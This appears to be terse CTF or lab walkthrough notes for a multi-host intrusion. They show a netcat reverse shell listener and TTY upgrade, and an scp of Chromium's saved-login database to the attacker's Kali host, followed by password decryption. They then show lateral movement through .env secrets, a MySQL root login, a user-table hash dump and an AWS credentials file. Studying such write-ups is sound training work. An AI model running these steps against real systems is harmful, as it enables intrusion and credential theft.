====== Find Garry's Password ======
==== Start Reverse Shell Listener ====
root@kali$
nc -l 8000
==== Enhance Shell ====
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/#method-3-upgrading-from-netcat-with-magic
garry@desktop$
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
echo $TERM
stty -a
stty raw -echo
fg
reset
--> xterm
==== Enable ssh and exfiltrate ====
garry@desktop$
ssh-keygen
-->copy/paste id_rsa.pub -> root@kali
scp .config/chromium/Default/Login\ Data root@10.5.4.3:/tmp
==== Get Chrome Password ====
root@kali$
apt-get install python3-pip
sudo pip install pycrypto
apt-get install sqlite3
cd /tmp
#sqlite3 Login\ Data 'select username_value, password_value from logins;'
./get_chrome_pass.py
Decrypting the string: b'v...'
b...e
==== ssh to intern Server ====
garry@desktop$
ssh 192.168.6.105
====== Find Bob's Password ======
garry@server-intern$
python -c 'import pty; pty.spawn("/bin/bash")'
cat /var/www/app/.env
MYSQL_ROOT_PASSWORD=t..r
MYSQL_USER=d..r
MYSQL_PASSWORD=xxx
MYSQL_DATABASE=xxx
cat /var/www/app/www/conf.php
'localhost',
'user'=>getenv('MYSQL_USER'),
'password'=>getenv('MYSQL_PASSWORD'),
'dbname'=>'intern',
'port'=>3306,
'charset'=>'utf8'
];
?>
cat /var/www/app/www/login.php
// Prepare a select statement
$sql = "SELECT id, username, password FROM users WHERE username = ?";
mysql -h 192.168.6.105 -u root -p intern
-> t..r
mysql> select * from users;
+----+----------+----------------------------------+---------------------+
| id | username | password | created_at |
+----+----------+----------------------------------+---------------------+
| 1 | bob | xxx | 2021-06-26 10:35:43 |
| 2 | garry | xxx | 2021-06-26 10:35:43 |
+----+----------+----------------------------------+---------------------+
google for hash
--> b..7
====== Find AWS Keys ======
garry@server-intern$
ssh bob@192.168.6.22
cat /home/bob/.aws/credentials
[default]
aws_access_key_id = xxx
aws_secret_access_key = xxx